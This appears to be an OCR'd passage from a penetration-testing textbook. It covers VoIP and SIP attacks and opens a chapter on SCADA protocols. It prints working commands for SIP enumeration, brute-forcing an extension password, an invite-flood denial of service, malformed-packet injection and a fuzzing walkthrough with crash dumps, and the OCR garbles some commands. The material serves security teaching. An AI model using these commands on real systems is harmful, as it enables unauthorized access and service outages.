enumeration, password cracking, eavesdropping, fuzzing, and so forth. 

In this chapter, we cover the following topics: 

• What is VoIP? 

• Protocols used by VoIP 

• Types of VoIP attacks 

• How to protect against VoIP attacks 

What Is VoIP? 

VoIP, or Voice over Internet Protocol, is a type of transmissions medium that is respon- 
sible for the delivery of real-time voice and data communication. Unlike its analog 
predecessor in which the transport functionality was routed via the public switched 
telephone network (PSTN), calls are now converted from an analog signal to a digital 
format, which is what the Internet Protocol (IP) uses for transmission and delivery, 
making VoIP possible. Several other key processes, such as signaling, authentication, 
security, call control, and voice compression, are established by VoIP prior to and 
during the call setup phase. 
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The evolution of VoIP is certainly an amazing one, starting back in 1995 when a com- 
pany called VocalTec Communications released what is believed to be the world's first 
Internet software phone product, called Internet Phone. This software was designed to 
ran on home computers very much like the softphone PC clients of today. Telephone 
calls were made in a peer-to-peer fashion (PC to PC) and utilized earlier adopted VoIP 
protocols such as H.323. Although VocalTec had a great deal of success as a pioneer in 
this new area of telecommunications, the technology had several drawbacks. A major 
drawback was the lack of broadband availability. At that time, the use of lower-speed 
modems was highly prevalent, and the infrastructure was not in place to support the 
much needed bandwidth and higher transmission rate requirements. Quality of service 
was also a huge deterrent. The advancements made in modern codec and audio com- 
pression technologies just were not there in the past. The combination of using voice 
communication in conjunction with the slower modem technology resulted in serious 
voice quality concerns. 

With the emergence of broadband along with the continued innovation in VoIP 
development, protocol standardization and formality started to arise. Superior ad- 
vancements in routing and switching with emphasis on QoS control and packet prior- 
ity aided in building the next-generation VoIP platform of today. Notably, despite the 
expansive growth of VoIP, security considerations were very limited. With this increased 
momentum, VoIP as a mainstream offering became the premiere product choice of 
telcos such as Sprint, Verizon, AT&T, Comcast, and so forth, which viewed it as a highly 
lucrative and low-cost mechanism for residential and business customers. This in itself 
created a new type of competition and marketing mix, with various flavors of service 
offerings and price point differentiators to meet the needs of many potential clients. 

The migration from legacy (analog) type service to VoIP (packet switched) type 
service has continued growing at a substantial rate. As seen today, the overall subscrip- 
tion cost for VoIP is considerably lower than the subscription cost for its legacy com- 
panion. With VoIP, fees are geared toward being flat and fee-based, including both local 
and long distance, while legacy lines still prove to be quite costly. More importantly, the 
improvement in voice intelligibility and call quality definitely has made it a worth- 
while candidate. Thus, the answer to the question "What is VoIP?" could reasonably be 
that it is the marriage of many complex protocols for use in the exchange of real-time 
communication for both voice and data communication. 

Protocols Used by VoIP 

A number of protocols are utilized in VoIP communications. As we explore further, you 
will find that certain protocols have rather comprehensive methods and functions. This 
potentially increases the probability for exploitation due to the number of error paths 
and use-case scenarios that can be generated. The most common protocols used by 
VoIP are: 

• Session Initiation Protocol (SIP) 

• Media Gateway Control Protocol (MGCP, Megaco, or H.248) 

• H.323 
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• Transport Layer Security (TLS) 

• Datagram TLS (DTLS) 

• Secure Real-time Transport Protocol (SRTP) 

• Zimmermann Real-time Transport Protocol (ZRTP) 

SIP 

SIP is documented in RFC 3261 and is recognized globally as a worldwide standard. SIP 
is an application layer control (signaling) protocol for creating, modifying, and termi- 
nating sessions with one or more participants. Due to its simplicity as a text-based 
protocol, the probability of attackers discovering flaws in it is greater. It is also impor- 
tant to note that SIP on its own offers very little security, making it a target of choice for 
attackers. 

• Proxy server An intermediary entity that acts as both a server and a client for 
the purpose of making requests on behalf of other clients. 

• Registrar server A SIP server that can authenticate and register user agents. 

• Redirect server A user agent server that generates SIP 3xx responses to 
requests it receives, directing the client to contact an alternative set of URIs. 

• User agent (UA) Can be a soft client or a hard phone that supports the SIP 
protocol. The user agent can originate or terminate calls. 

The SIP protocol defines several methods: 

• SIP method invite Invite another UA to a session 

• SIP method invite re-invite Change a running session 

• SIP method register Register a location with a SIP registrar server 

• SIP method ack Facilitate reliable message exchange for INVITEs 

• SIP method cancel Cancel an invite 

• SIP method bye Hang up a session 

• SIP method options Features supported by the other side 

The SIP protocol defines several responses: 

• lxx Informational 100 Trying, 180 Ringing 

• 2xx Successful 200 OK, 202 Accepted 

• 3xx Redirection 302 Moved Temporarily 

• 4xx Request Failure 404 Not Found, 482 Loop Detected 

• 5xx Server Failure 501 Not Implemented 

• 6xx Global Failure 603 Decline 
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The following are SIP method extensions as defined in other RFCs: 

• SIP method info Extension in RFC 2976 

• SIP method notify Extension in RFC 2848 PINT 

• SIP method subscribe Extension in RFC 2848 PINT 

• SIP method unsubscribe Extension in RFC 2848 PINT 

• SIP method update Extension in RFC 3311 

• SIP method message Extension in RFC 3428 

• SIP method refer Extension in RFC 3515 

• SIP method prack Extension in RFC 3262 

• SIP specific event notification Extension in RFC 3265 

• SIP message waiting indication Extension in RFC 3842 

• SIP method publish Extension is RFC 3903 

Megaco H.248 

Megaco H.248 (Media Gateway Control Protocol) is documented in RFC 3525 and is 
recognized as a standard. Megaco H.248 defines the protocol for media gateway con- 
trollers to control media gateways for the support of multimedia streams across net- 
works. This protocol is text based, making it easy to modify and analyze from an at- 
tacker's point of view. 

H.323 

H.323 is a widely implemented recommendation published by the International Tele- 
communication Union Telecommunication Standardization Sector (ITU-T). This rec- 
ommendation provides a foundation for multimedia communications (audio, video, 
and data) over packet-based networks (PBNs).The PBN over which H.323 entities com- 
municate may be a point-to-point connection, a single network segment, or an inter- 
network that has multiple segments with complex topologies. 

H.323 is composed of the following protocols: 

• Digital Video Broadcasting (DVB) Defines a set of open standards for 
digital television 

• H.225 Covers narrow-band visual telephone services 

• H.225 Annex G Describes methods to allow address resolution, access 
authorization, and usage reporting H.323 systems 

• H.225E Describes a packetization format and a set of procedures that can be 
used to implement UDP- and TCP-based protocols. 

• H.235 Covers security and authentication 

• H.323SET Describes the standards for simple endpoint types in H323 
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• H.245 Negotiates channel usage and capabilities 

• H.450. 1 Defines supplementary services for H.323 

• H. 450.2 Covers Call Transfer supplementary services for H.323 

• H.450. 3 Covers Call Diversion supplementary services for H.323 

• H.450. 4 Covers Call Hold supplementary service 

• H.450. 5 Covers Call Park supplementary service 

• H.450. 6 Covers Call Waiting supplementary service 

• H.450. 7 Covers Message Waiting Indication supplementary service 

• H.450. 8 Covers Calling Party Name Presentation supplementary service 

• H.450. 9 Covers Completion of Calls to Busy Subscribers supplementary 
service 

• H.450. 10 Covers Call Offer supplementary service 

• H.450. 11 Covers Call Intrusion supplementary service 

• H.450. 12 Covers ANF-CMN supplementary service 

• H.261 Describes a video stream for transport using the Real-time Transport 
Protocol 

• H.263 Defines a video coding standard in which support numerous bit rates 

• Q.931 Manages call setup and termination 

• Registration, Admission, and Status (RAS) Manages registration, 
admission, and status messages used in the gatekeeper discovery and endpoint 
registration processes. 

• Real-time Transport Protocol (RTP) Provides end-to-end network transport 
functions 

• RTP Control Protocol (RTCP) Provides control and statistical information 
to all participants in the session 

• T.38 Defines IP-based fax transmission 

• T. 125 Multipoint Communication Service Protocol (MCS) 

TLS and DTLS 

Transport Layer Security (TLS) is documented in RFC 5426. TLS is normally used to 
secure communications between web browsers and web servers, but it can also be used 
to secure VoIP. TLS can provide confidentiality and integrity protection, but attacks that 
affect availability can still be performed. 

Datagram Transport Layer Security (DTLS) is documented in RFC 4347 and RFC 
5238. DTLS is based on TLS and is designed to prevent eavesdropping, tampering, and 
message manipulation/forgery. It can be used with a centrally managed public key in- 
frastructure (PKI). 
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SRTP 

The Secure Real-time Transport Protocol (SRTP) is documented in RFC 3711. SRTP is 
the protocol used to encrypt the low-level voice packets. Beyond encryption, SRTP is 
intended to provide message authentication, integrity checking, and replay protection. 

ZRTP 

Zimmermann Real-time Transport Protocol (ZRTP) is documented in IETF Internet 
Draft avt-zrtp. ZRTP is a VoIP encryption key-agreement protocol that two communi- 
cation endpoints use to negotiate the SRTP session key. 

Types of VoIP Attacks 

VoIP architectures and services are prone to several types of attacks. These can be cate- 
gorized into vulnerabilities or exploits that violate any of the CIA (confidentiality, in- 
tegrity, and availability) tenants, as shown in Figure 18-1 and detailed here: 

• Confidentiality Attacks include eavesdropping, packet sniffing, password 
cracking, social engineering, information leakage 

• Integrity Attacks include message, log, and configuration tampering, and bit 
flipping 

• Availability Attacks and vulnerabilities include denial of service (DoS), 
distributed DoS, physical tampering, corruption of data, manmade and 
natural disasters, and fuzzing 

An additional category of violations could be attacks to circumvent authenticity. 
These attacks would include spoofing and man-in-the-middle replay attacks. 

Since SIP is the most prevalent VoIP protocol that is deployed globally, let's focus 
our sights on understanding some of the more popular SIP attacks: 

• Enumeration 

• SIP password cracking 

• Eavesdropping/packet capture 

• Denial of service 

Enumeration 

Enumeration is the process of gathering information about a target system or network 
entity for reconnaissance and potential exploitation. Tools such as SIPVicious, Smap, 
Nmap, and so forth are capable of retrieving valuable information from a SIP server. 
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This information in turn may identify what application, service, or operating system is 
actively running. For example, if we were to ran the svmap.py executable, one of sev- 
eral tools in the SIPVicious suite, on a SIP-enabled device as shown next, we should be 
able to obtain the device's fingerprint information to establish its identity and version 
number. 

Python svmap.py 192.168.0.199 

| SIP Device | User Agent I Fingerprint I 

| 192.168.0.199:5060 | 3CXPhoneSystem 8.0.10708.0 | 3CXPhoneSystem | 

This information can be quite useful to the attacker because it gives them the name and 
build number of the user agent. There could be exploits written against this system to 
attack known vulnerabilities that have not been patched or resolved. 
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Nmap is another very useful enumeration utility. By performing a simple UDP scan 
on port 5060 of the user agent, we see that this port is open and that the SIP service is 
active: 



Nmap -sU 192.168.0.199 -p 5060 

Starting Nmap 5.20 ( http://nmap.org ) at 2010-03-02 22:33 EST 
Nmap scan report for 192.168.0.199 
Host is up (0.077s latency). 

PORT STATE SERVICE 

5060/udp open | filtered sip 

MAC Address: 00 : 22 : FA : Cl : CF : 8 8 (Intel Corporate) 



Additional enumeration can be performed by analyzing/sniffing the network using 
an ARP poisoning tool like Dsniff. This in turn would allow us to capture all of the SIP 
URIs on that particular LAN segment. 



SIP Password Cracking 

There are quite a few tools that can perform SIP password cracking, such as Cain & 
Abel, SIP.Tastic, Vnak, and the SIPVicious tool suit. As shown next, the svcrack.py util- 
ity, part of the SIPVicious toolset, is able to run a brute-force attack on the SIP PBX ex- 
tension 100 to locate its password: 

python svcrack.py -ulOO -rl-999 -z2 192.168.0.199 
| Extension | Password | 



| 100 | 777 | 

Other SIP password-cracking tools such as Cain & Abel are able to perform a man- 
in-the-middle attack and sniff the SIP authentication process between a SIP user agent 
and a SIP server. Still other types of SIP password-cracking tools are powerful enough 
to perform both active and offline dictionary attacks. 



Eavesdropping/Packet Capture 

Unless some type of encryption mechanism is used, such as TLS-DTLS, SRTP, or ZRTP, 
the call signaling or voice (bearer) path will be vulnerable to eavesdropping and/or 
interception. In basic and smaller deployment scenarios, usually security is an after- 
thought. In large VoIP deployments, security mechanisms may be limited to TLS, which 
only secures the signaling path, leaving the voice path subject to eavesdropping. In fact, 
the open source tool Wireshark can easily capture and analyze unencrypted RTP pack- 
ets for immediate playback. 




NOTE Although SRTP and ZRTP offer efficient encryption support for voice, 
these protocols still have limited deployment and implementation. 



https://www.facebook.eom/pages/Download-from-harks/1 2420175441 7002 



Chapter 18: VoIP Attacks 

387 



Denial of Service 

Denial of service (DoS) can be defined as an incident in which a user or organization 
is deprived of necessary services or resources that are needed for the user or organiza- 
tion to be fully functional. Utilizing some of the behaviors of SIP, there are several 
methods that can deteriorate and hinder normal operation. This section discusses three 
tools that can be used in SIP DoS attacks. 

inviteflood 

One type of attack that can consume resources and cause outages is the SIP invite flood. 
The inviteflood tool is one tool that can be used to execute a SIP invite flood. This tool 
works in transmit mode only and can be quite effective at promoting a DoS attack. The 
tool generates semivalid invite messages that are transmitted at a phenomenal speed 
and rate. During the execution of this tool against several commercial SIP server and 
SIP softclient types with active calls, very few were able to throttle or block the incom- 
ing SIP flood, which resulted in continuous dropped calls and SIP exceptions. 

Basic inviteflood Command Line Example: 

./inviteflood ethO "217+4262" sip.inphonex.com 192.168.0.199 30000 -v 

Asteroid 

Another interesting tool used in SIP DoS attacks is called Asteroid. This is a DoS testing 
tool that contains 36KB of malformed/fuzzed SIP test packets that fall into the follow- 
ing SIP message categories: 

. /ASTEROID/ invites 
. /ASTEROID/ cancels 
. /ASTEROI D/byes 
. /ASTEROID/ refers 
. /ASTEROID/ opt ion 
. /ASTEROID/ registers 
. /ASTEROID/subscribes 
. /ASTEROID/ notifies 

To utilize Asteriod, you first have to install the Netcat utility. After you install Net- 
cat, extract the Asteroid content and cd into one of the Asteroid test packet directories 
such as /ASTEROID/invites. For easier test case handling and automated execution, the 
following script was created to rename the test case folder contents using the .pdu ex- 
tension name: 

//Script used to rename the test cases with the .pdu extension 

# /bin/csh 

foreach file (*) 

set base= 'basename Sfile.pdu' 

echo " base : $file .pdu" 

mv $file Sfile.pdu 

end 
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Once the test case packets are renamed by running the preceding script, you can 
then use the following command line to promote automated test case execution of the 
SIP test packets to the system under test. Transmission of the packets can be verified 
using Wireshark or tcpdump. 

//Script used to automate the test case execution in each folder 
for x in *.pdu; do cat $x|perl *$x 192.168.0.199; sleep 3; 
echo sending test case $x; done 






VolPER 

In our opinion, VolPER is one of the most comprehensive open source VoIP test tools 
because it is based on the concept of fuzzing, a technique that is used to inject irregular 
message content and data inputs in an effort to test the robustness of a system. To prove 
the exceptional capabilities of VoIP fuzzing attacks, we chose to use the VolPER tool 
(authored by "nnp") because of its software portability, relative ease of use, and novel 
use of automation. VolPER is a security tool that contains several SIP fuzzing modules 
based on known SIP methods that are supported today. 

Before you get started with the VolPER Exploit Research Toolkit, you need Python 
2.4.4, wxPython runtime 2,4, and the ctypes module. You also need the QuteCom SIP 
softphone client to evaluate the interactive responses to the VolPER Exploit Research 
Toolkit. Additionally, our test bed will utilize two Windows machines. We'll use Win- 
dows PC 1 for process management and debugging, and we'll use Windows PC 2 to 
transmit malformed/fuzzed SIP messages. 

VolPER Installation and Execution Steps Following are the steps to install 

and execute VolPER: 

1. Install Python 2.4.4 on both Windows machines using the default installation 
parameters. 

2. Install wxPython runtime 2.4 (win32-ansi) on both Windows machines, and 
choose the default installation parameters. 

3. Install ctypes ctypes-1.0.2.win32-py2.4.exe on both Windows machines, and 
choose the default installation parameters. 

4. Install the VolPER Exploit Research Toolkit on both Windows machines. The 
version that you want to download is VolPER v0.06. You will need to gunzip 
and untar the VolPER content to the C:\VoIPER-0.06 directory. 

5. You need a SIP client to test. For this example, choose the open source SIP 
client QuteCom, which is the new name for the open source softphone 
previously known as WengoPhone. 



NOTE It is extremely important to monitor the system under test (SUT) 
very closely for memory impairment, exception handling and reporting, 
and general behavior while performing test case execution. It is also highly 
recommended that the SUT engage active calls in order to determine impact 
to overall call integrity and call quality. 
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NOTE This test setup will actually re-create two bugs that were reported 
to the QuteCom Development team by the author of this chapter under 
Trac ticket/defect # 1 88, “Malformed/fuzzed sip invite msgs will crash 
client.” The QuteCom software build that this ticket was written against 
is QuteCom-2.2-RC3-setup-release.exe. 



6. Install the QuteCom softclient on PC 1. 

7. Sign up for a free SIP account. For purposes of this example, use SIP service 
from InPhonex. The QuteCom softclient requires registration information 
that you obtain by registering with InPhonex. Once you enter the registration 
information into the QuteCom client, click Connect, and the QuteCom client 
should register and become active. 

8. We should now be ready to start our testing. The VoIPER tool has three test 
modes available. For our example, we will be using Level 3, which is the 
preferred test mode because it focuses on VoIPER's unique automation and 
process monitoring capabilities. 

9. On PC 1 (the same PC that is running the QuteCom softclient), attach the 
VoIPER debug process to the QuteCom softclient. To do this, you need to 
launch the Windows command line. 

10. Use the cd command to go to the VoIPER directory that you created on the 
C:\ drive. 

11. Enter the following command-line syntax to monitor the QuteCom process 
(the name of which can be found within Windows Task Manager): 



C : \VoIPER-0 . 06>python sulley\win_process_monitor .py -c 
sessionsXQuteComtestl . crashbin -p QuteCom.exe -1 3 
[07:50.06] Process Monitor PED-RPC server initialized: 
[07:50.06] crash file: sessions\QuteComtestl . crashbin 

[07:50.06] # records: 0 

[07:50.06] proc name: QuteCom.exe 

[07:50.06] log level: 3 

[07:50.06] awaiting requests... 



In the preceding syntax, QuteComtestl. crashbin is the name of the file in 
which you want to record information about the crash, and QuteCom.exe is 
the name of the process in memory to monitor. 

12. Move to PC 2 to launch the VoIPER fuzzer. From a Windows command prompt 
on PC 2, cd to the VoIPER directory and launch the VoIPER GUI by typing 



python win_fuzzer_gui . py . 

13. Once the VoIPER GUI is launched, set the following parameters (see 
Figure 18-2): 

Target Selection 

• Target host The IP address of PC 1 . 

• Target port The default SIP port number is set to 5060. 
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Crash Detection/Target Management 

• Level Set the level to 3 for this test to provide an automated approach of 
fuzzing the SIP messages and capturing the debug data if any crashes are 
caught. (This is the preferred method to test.) 

• PedRPC port The default port number is 26002. The PedRPC port is the 
port the remote process monitor script is listening to. 

• Restart Interval The interval at which the fuzzer will instruct the process 
monitor script to restart the target process. For our test, we will use a value 
of 0. 

• Start Cmd The path to the QuteCom executable, which is C:\Program 
Files\QuteCom\QuteCom.exe. 

• Stop Cmd The default TERMINATE_PID is being used. 

Fuzzer Configuration 

• Fuzzer For our test, we will use SIPInviteCommonFuzz, but other fuzzing 
modules are available. 

• Session Name We will call our session QuteComtestl, but you can use 
whatever name you prefer. 

Optional: Leave the optional parameters at their default values. 

14. Click Start in the Control Panel area on the GUI and watch the magic begin. 

Once the test has started, you will see within the Windows command line on 
PC 1 that the win_process_monitor script updates, and confirms connection 
to the QuteCom process: 

C : \VoIPER-0 . 06>python sulley\win_process_monitor . py -c sessionsX 

QuteComtest . crashbin -p QuteCom.exe -1 3 

[07:50.06] Process Monitor PED-RPC server initialized: 

[07:50.06] crash file: sessions\QuteComtestl . crashbin 

[07:50.06] # records: 0 

[07:50.06] proc name: QuteCom.exe 

[07:50.06] log level: 3 

[07:50.06] awaiting requests... 

[10:41.41] updating start commands to: 

[ 'C:\\Program FilesWQuteComWQuteCom.exe 

[10:41.42] updating stop commands to: [ 1 TERMINATE_PID 1 ] 

[10:41.42] debugger thread-1266853302 looking for process name: 
QuteCom.exe 

[10:41.42] debugger thread-1266853302 found match on pid 3260 

You will also see that on PC 2 within the VoIPER toolkit GUI, test cases have 
started to execute. 

15. As we continue our testing, it appears that we have found a bug/ crash, as 
shown in Figure 18-3. 
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Figure 18-2 

VolPER test case 
execution 



jO VolPER : VoIP Exploit Research tookit v0.06 






Target Selection 




Fuzzer Configuration 


Target host 


Fuzzer SIPInviteCommonFuzz ▼ 






Target port 5060 




Session Name QuteComtesti 


Crash Detection/Target Management 
Level 1 3 ., | 

PedRPC port 26002 

Restart Interval 0 




Optional 

Wait for client registration 

Tests to skip 0 

Max fuzz data 8192 


Start Cmd Iom\QuteCom.exe 










Control Panel 


Stop Cmd TERMINATE_PID 


Stop ] [ Restart | 









Log 

Sent 17/56556 test cases 0 detected crashes 



VolPER - VoIP Exploit Research toolkit v0.06 by nnp 
http : //voiper . sourcef orge . net 

Name: SIPInviteCommonFuzzer 
Protocol: SIP 
Success Factor: High 

Fuzzes the headers commonly found and most likely to be processed in a SIP INVITE request 

[18:30.11] [!] Path sessions/QuteComtestl does not exist or we do not have sufficient permissions. 
[18:30. 1 1] [+] Attempting to create sessions/QuteComtestl 
[18:30. 1 1] [+] Successfully created sessions/QuteComtestl 

[18:30.12] current fuzz path : - > INVITE .COMMON 
[18:30.12] fuzzed 0 of 56556 total cases 
[18:30.14] xmitting: [1.1] 

[18:30.15] xmitting: [1.2] 

[18:30.16] xmitting: [1.3] 



Figure 18-3 

VolPER bug/crash 
identification 



[18:44.51] xmitting: [1.41] 

[18:44.52] xmitting: [1.42] 

[18:44.53] xmitting: [1.43] 

[18:44.54] xmitting: [1.44] 

[18:44.55] xmitting: [1.45] 

[18:44.56] xmitting: [1.46] 

[18:44.56] SocketError cancelling request. Ensure target is listening. 

[18:44.56] procmon detected access violation on test case #46 
[18:44.56] primitive lacks a name, type: string, default value: 1 

[18:44.57] phapi.dll: 1 00 133d7 mov eax,[edx+0x4] from thread 4052 caused access violation 
[18:44.57] Fuzz request logged to sessions/QuteComtestl/l_46.crashlog 
[18:44.57] restarting target process 

[18:44.57] SocketError cancelling request. Ensure target is listening. 

[18:44.58] SocketError cancelling request. Ensure target is listening. 

[18:45.08] xmitting: [1.47] 

[18:45.09] xmitting: [1.48] 
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16. It appears that test case #46 has caused our crash. Pause the VoIPER toolkit on 
PC 2 for a moment to investigate the crash further. 

17. From another Windows command prompt, cd into the VoIPER directory on 
PC 1, which is the target machine, and run the following command: 

C : \VoIPER-0 . 0 6>python sulley/s_utils/crashbin_explorer . py 
sessions/QuteComtestl . crashbin 

[1] phapi . dll : 10013917 mov eax, [edx+0x4] from thread 1284 caused 
access violation 46, 

18. The preceding output gives us the same error that is reported within the 
VoIPER GUI. We will now explore the exception a bit deeper. From within 
the same command prompt, run the following command: 

C:\VoIPER-0. 06> 

python sulley/s_utils/crashbin_explorer . pysessions/QC . crashbin -t 46 
phapi . dll : 10013917 mov eax, [edx+0x4 ] from thread 1284 
caused access violation when attempting to read from 0x00000004 
CONTEXT DUMP 



EIP 


10013917 mov eax, [edx+0x4] 


EAX 


00000000 ( 


0 


) -> N/A 


EBX 


01e384d8 ( 


31687896 


) -> 2)Xxx-C (heap) 


ECX 


OOOOOOOf ( 


15 


) -> N/A 


EDX 


00000000 ( 


0 


) -> N/A 


EDI 


02e05960 ( 


48257376 


) -> pZ (heap) 


ESI 


02fda068 ( 


50176104 


) -> 8Y (heap) 


EBP 


00000000 ( 


0 


) -> N/A 


ESP 


03f2fe80 ( 


66256512 


) -> PD (stack) 


+ 00 


02e04450 ( 


48251984 


) -> INVITE sip : tester 0 1 92 


SIP/2.0 (heap) 






+04 


02e05948 ( 


48257352 


) -> 'YumenpZh(YZ (heap) 


+08 


1002613f ( 268591423 


) -> N/A 


+0c 


02e05960 ( 


48257376 


) -> pZ (heap) 


+10 


OlOf fd38 ( 


17825080 


) -> ]amu8 (heap) 


+14 


00272420 ( 


2565152 


) -> N/A 


sasm around: 








0xl00138fb 


jz 0x10013911 




0xl00138fd 


mov eax. 


[esi+Oxc] 




0x10013900 


mov ecx. 


[esi+0x4 ] 




0x10013903 


push eax 






0x10013904 


push ecx 






0x10013905 


call 0xl00137c0 




0x1001390a 


add esp, 


0x8 




0xl001390d 


test eax 


, eax 




0xl001390f 


jnz 0x1001396a 




0x10013911 


mov edx. 


[edi+0xac] 




0x10013917 


mov eax. 


[edx+0x4 ] 




0x1001391a 


mov edi. 


[eax+Oxc] 




0xl001391d 


mov eax. 


[esi+Oxc] 




0x10013920 


mov ecx. 


edi 




0x10013922 


mov dl, [ 


eax] 




0x10013924 


emp dl, [ 


ecx] 




0x10013926 


jnz 0x10013942 




0x10013928 


test dl. 


dl 




0x1001392a 


jz 0xl001393e 




0x1001392c 


mov dl, [eax+Oxl] 




0xl001392f 


emp dl, [ 


ecx+0xl ] 



SEH unwind: 



03f 2f fdc -> MSVCR80 . dll : 7 8 138ced 
ffffffff -> kernel 32 . dll : 7c839ad8 
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The preceding command provides information about the process's state when 
it crashed, such as registers, stack unwinds, and so on. This type of data is 
invaluable in providing bug resolution. 

19. Now that we have found our first bug, you can return to testing by going back 
to the VoIPER GUI on PC 2 and clicking Restart within the Control Panel. You 
should also notice since the first crash that the QuteCom softclient and its 
process were automatically restarted. 

All in all, VoIPER is a phenomenal open source tool. The combination of its auto- 
mation capabilities and sheer number of test case scenarios provides a self-contained 
framework for exhaustive SIP analysis and bug discovery. 



NOTE Crashes occurred while testing the QuteCom SIP client and the 
issues were readily addressed with patches as soon as they were reported. 
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How to Protect Against VoIP Attacks 

To protect against VoIP attacks, you should follow the same conventional methods and 
security best practices that you use for any other software segment. Test your system 
thoroughly via penetration testing and implement a strategy of defense in depth that 
encompasses the entire system. Defense in depth is achieved by 

• Making it harder for intruders to penetrate all defenses to compromise the 
security of the network 

• Greatly reducing the likelihood of a security breach 
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• Accelerating the deployment of modular security architectures that can be 
implemented in phases 

• Minimizing downtime in the event of a security breach or network failure 
Additional strategies that should be leveraged include 

• Segmenting signaling and bearer paths into different VLANs 

• Segmenting VoIP user agents such as VoIP hard phones from PC infrastructure 

• Incorporating scheduled upgrades (including patch maintenance) 

• Utilizing protective protocols such as IPsec, PKI, TLS-DTLS, SRTP, and ZRTP if 
possible 

• Implementing a Security Information and Event Management (SIEM) system 
for log aggregation, maintenance, and audit analysis 

• Implementing a scalable edge network strategy for all applicable firewalls, 
switches, routers, and IDS devices 

• Confirming and ensuring policies are in place for two- and three-factor 
authentication 

• Ensuring scheduled internal security assessments are routinely performed 

• Using vendors that have gone through certification processes 

These security measures, along with proper planning, should deter and greatly 
reduce the risk of any type of breach. Welcome to the brave new world of VoIP. 
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SCADA Attacks 



The ever-changing world continues to bring with its evolution numerous accomplish- 
ments and challenges. In the last decade alone, we have created a network infrastructure 
of almost infinite proportions in which we communicate today. The IP cloud covers us 
all, and truly understanding its philosophical transparency and our critical dependence 
on its services could be a complex feat. Almost everything is connected to the vast realm 
of the Internet, and SCADA devices are no exception. The migration of the SCADA in- 
frastructure from legacy to IP brings with it the relative ease of remote management and 
connectivity, but also the possible burden of network attacks and sabotage. One of the 
most important questions that you should ask your clients is, "Is your SCADA system 
secure, and how do you know?" 

In this chapter, we cover the following topics: 

• What is SCADA? 

• Which protocols does SCADA use? 

• SCADA fuzzing 

• Stuxnet malware (the new wave in cyberterrorism) 

• How to protect against SCADA attacks 



What Is SCADA? 

SCADA stands for supervisory control and data acquisition. SCADA networks control and 
monitor the critical utility and process control infrastructures for manufacturing, pro- 
duction, and power generation for utility companies, including electricity, natural gas, 
oil, water, sewage, and railroads. 

The development of SCADA can be traced back to the beginning of the 19 th century 
through the introduction of telemetry, which involves the transmission and monitor- 
ing of data obtained by sensing real-time conditions. Since the inception of telemetry, 
SCADA networks have become popular to control electrical and other infrastructure 
systems. An example of early telemetry is ComEd, one of the largest electric utility com- 
panies, that developed a system to monitor electrical loads on its power grid. 
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The following are common SCADA components: 

• Remote terminal unit (RTU) A device used to convert analog and discrete 
measurements to digital information, such as an instruction to open a switch 
or valve. 

• Intelligent electronic device (IED) A microprocessor-based controller 
that can issue control commands, such as to trip circuit breakers or raise or 
lower voltage levels if the IED senses voltage, current, or frequency anomalies. 
Some examples of IEDs are capacitor bank switches, circuit breakers, recloser 
controllers, transformers, and voltage regulators. 

• Programmable logic controller (PLC) Very similar to an RTU in regard to 
operation, and may have additional intelligence through a real-time operating 
system (RTOS) with embedded I/O servers, and services such as SSH, FTP, and 
SNMP enabled. 

• Human machine interface (HMI) The graphical representation (or GUI) of 
the control environment to the administrator. 

Which Protocols Does SCADA Use? 

SCADA uses several protocols. The most common protocols are 

• Object Linking and Embedding for Process Control (OPC) 

• Inter-Control Center Protocol (ICCP) 

• Modbus 

• Distributed Network Protocol version 3 (DNP3) 



OPC 

OLE for Process Control is a software interface standard that allows Windows programs 
to communicate with industrial hardware devices. OPC is implemented in client/server 
pairs. The OPC server is a software program that converts the hardware communica- 
tions protocol used by a PLC into the OPC protocol. The OPC client software is any 
program that needs to connect to the hardware, such as an HMI. The OPC client uses 
the OPC server to get data from or send commands to the hardware. 

ICCP 

Inter-Control Center Protocol is an application layer protocol and is also known as 
International Electrotechnical Commission (IEC) Telecontrol Application Service 
Element 2 (TASE.2). It has been standardized under the IEC 60870-6 specifications and 
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allows for real-time data exchange over wide area networks (WANs) between utility 
control centers. ICCP provides transactions for queries, monitoring, data transfer, and 
scheduling between clients and servers. 

Modbus 

Modbus is a protocol specification designed for building automation equipment used 
to interface with various devices over RS485 serial and TCP/IP interfaces. Due to the 
longevity of the Modbus protocol and its widespread implementation, it is now the 
most commonly available means of networking industrial electronic devices. 

Several Modbus protocol versions exist, described as follows by Wikipedia (with 
minor adjustments): 

• Modbus RTU This is used in serial communication and makes use of a 
compact, binary representation of the data for protocol communication. 

The RTU format follows the commands/data with a cyclic redundancy check 
checksum as an error check mechanism to ensure the reliability of data. 
Modbus RTU is the most common implementation available for Modbus. 

A Modbus RTU message must be transmitted continuously without inter- 
character hesitations. Modbus messages are framed (separated) by idle 
(silent) periods. 

• Modbus ASCII This is used in serial communication and makes use of ASCII 
characters for protocol communication. The ASCII format uses a longitudinal 
redundancy check checksum. Modbus ASCII messages are framed by a leading 
colon (:) and trailing newline (CR/LF). 

• Modbus TCP/IP or Modbus TCP This is a Modbus variant used for 
communications over TCP/IP networks. It does not require a checksum 
calculation as lower layer takes care of the same. 

• Modbus over TCP/IP or Modbus over TCP This is a Modbus variant that 
differs from Modbus TCP in that a checksum is included in the payload, as 
with Modbus RTU. 

• Modbus Plus (Modbus+ or MB+) An extended version that remains 
proprietary to Modicon (a subsidiary of Schneider Electric). It requires a 
dedicated coprocessor to handle fast HDLC-like token rotation. It uses twisted 
pair at 1 Mbps and includes transformer isolation at each node, which makes 
it transition/edge triggered instead of voltage/level triggered. Special interfaces 
are required to connect Modbus Plus to a computer, typically a card made for 
the ISA (SA85), PCI, or PCMCIA bus. 



Table 19-1 lists common Modbus function codes. 
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Table 19-1 

Common Modbus 
Function Codes 



01 


Read coil status 


02 


Read input status 


03 


Read holding registers 


04 


Read input registers 


05 


Force single coil 


06 


Preset single register 


07 


Read exception status 


15 


Force multiple coils 


16 


Preset multiple registers 


17 


Report slave ID 



DNP3 

Distributed Network Protocol version 3 is an open master/slave control system proto- 
col specifically designed for the requirements of electrical and water utility industries. 
Specifically it was developed to facilitate communications between various types of 
data acquisition and control equipment. It plays a crucial role in SCADA systems, where 
it is used by SCADA master stations (aka control centers), RTUs, and IEDs. 

DNP3 supports the following behaviors: 

• Request and respond with multiple data types in single messages. 

• Segment messages into multiple frames to ensure excellent error detection and 
recovery. 

• Include only changed data in response messages. 

• Assign priorities to data items and request data items periodically based on 
their priority. 

• Respond without request (unsolicited). 

• Support time synchronization and a standard time format. 

• Allow multiple masters and peer-to-peer operations. 

• Allow user definable objects including file transfer. 
